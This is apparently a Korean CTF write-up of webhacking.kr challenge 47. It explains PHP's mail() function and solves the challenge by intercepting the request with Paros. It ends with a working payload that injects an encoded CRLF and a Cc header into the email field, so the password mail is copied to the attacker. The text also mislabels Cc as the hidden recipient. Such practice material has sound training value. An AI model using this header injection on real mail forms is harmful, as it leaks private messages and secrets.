목차
webhacking.kr 47번 : php mail 변조
Key word : 숨은참조자, Cc
일단 이 문제를 풀기 위해서는
php의 mail함수에 대해서 알아야 한다.
mail(1, 2, 3, 4);
1. 받는 사람
2. 제목
3. 내용
4. 추가 옵션(사람 형식 참조)등 생략 가능
mail("asdf@naver.com","Hello","My name is M");
위의 구문은 asdf@naver.com 에게
Hello 제목
My name is M 이라는 내용을 전달 하는 구문이다.
눈과 머리가 있으면 금방 이해할 것이라 믿는다.
이 문제에서 가장 중요한건 Cc(숨은참조자) 입니다.
숨은참조자를 지정하면 asdf@naver.com 에게 메일이 가는 동시에 다른 사람에게도 참조가 가능하다는 얘기죠
<!-- index.phps --> 로 들어가보면
$header="From: $_POST[email]\r\n"; // 헤더 옵션에 From 변수를 사용하는 군요
mail("admin@webhacking.kr","readme","password is $pass",$header);
mail("admin@webhacking.kr","readme","password is $pass",$header);
그렇다면 이것을 변조하기 위해서는 어떻게 해야할까요?
일단 값을 변조하기 위해 Paros로 값을 캐치 해야 합니다.
email의 변수를 조작하여 봅시다
From : asdf@naver.com(줄바꿈)
Cc : 자신의메일@naver.com
이렇게 하면 될 것 같은 감이 오시죠?!
\r == %0D
\n == %0A
이 이상의 힌트는 드리지 않겠습니다.!^^
나머지는 스스로 삽질을 해보아요~~!!
asdf@naver.com%0D%0ACc: strikers1999@naver.com
